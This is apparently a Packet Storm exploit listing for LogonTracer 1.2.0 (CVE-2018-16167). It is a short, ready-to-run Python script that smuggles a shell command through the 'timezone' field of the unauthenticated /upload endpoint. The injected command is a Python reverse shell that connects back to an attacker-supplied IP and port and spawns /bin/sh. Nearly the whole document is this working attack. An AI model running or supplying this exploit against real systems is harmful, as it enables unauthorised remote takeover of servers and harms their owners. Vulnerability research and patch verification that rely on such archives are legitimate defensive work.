Lucene search

K
packetstormG0ldm45kPACKETSTORM:162880
HistoryJun 01, 2021 - 12:00 a.m.

LogonTracer 1.2.0 Remote Code Execution

2021-06-0100:00:00
g0ldm45k
packetstormsecurity.com
305

0.282 Low

EPSS

Percentile

96.9%

`# Exploit Title: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)  
# Date: 29/05/2021  
# Exploit Author: g0ldm45k  
# Vendor Homepage: https://www.jpcert.or.jp/  
# Software Link: https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.0  
# Version: 1.2.0 and earlier  
# Tested on: Version 1.2.0 on Debian GNU/Linux 8 (jessie)  
# CVE : CVE-2018-16167  
  
import requests  
import argparse  
  
parser = argparse.ArgumentParser(description='Send a payload to a LogonTracer 1.2.0 (or earlier) server.')  
parser.add_argument('aip', type=str, help='Attacker ip')  
parser.add_argument('aport', type=str, help='Attacker port')  
parser.add_argument('victimurl', type=str, help='Victim URL minus the path.')  
  
args = parser.parse_args()  
  
ATTACKER_IP = args.aip  
ATTACKER_PORT = args.aport  
PAYLOAD = f"python -c 'import pty,socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{ATTACKER_IP}\",{ATTACKER_PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'"  
  
VICTIM_URL = args.victimurl  
VICTIM_ENDPOINT = "/upload"  
  
DATA = {  
"logtype": "XML",  
"timezone": f"1;{PAYLOAD};",  
}  
  
print("[!] Sending request... If your terminal hangs, you might have a shell!")  
requests.post(f"{VICTIM_URL}{VICTIM_ENDPOINT}", data=DATA)  
print("[*] Done. Did you get what you wanted?")  
  
`

0.282 Low

EPSS

Percentile

96.9%